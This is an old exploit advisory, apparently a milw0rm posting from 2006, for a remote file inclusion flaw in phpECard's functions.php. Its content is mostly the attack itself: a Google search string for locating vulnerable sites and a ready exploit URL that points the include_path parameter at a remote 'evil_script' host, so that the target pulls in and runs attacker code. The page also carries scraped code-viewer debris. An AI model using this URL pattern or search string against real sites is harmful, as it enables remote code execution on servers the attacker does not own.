28 lines
No EOL
1,007 B
Text
28 lines
No EOL
1,007 B
Text
#==============================================================================================
|
|
# phpECard (functions.php) Remote File Inclusion Exploit
|
|
#===============================================================================================
|
|
#
|
|
#Critical Level : Dangerous
|
|
#
|
|
#Venedor site : http://www.quick-xs.net/phpecard/
|
|
#
|
|
#Google Search: powered by: phpecard
|
|
#
|
|
#================================================================================================
|
|
#================================================================================================
|
|
#
|
|
#Exploit :
|
|
#--------------------------------
|
|
#
|
|
#http://sitename.com/[Script Path]/functions.php?include_path=http://evil_script?
|
|
#
|
|
#
|
|
#================================================================================================
|
|
#Discoverd By : LeAk
|
|
#
|
|
#Conatact : Escape_LeAk[at]yahoo.com
|
|
#
|
|
# Turkis Hackers
|
|
==================================================================================================
|
|
|
|
# milw0rm.com [2006-08-29] |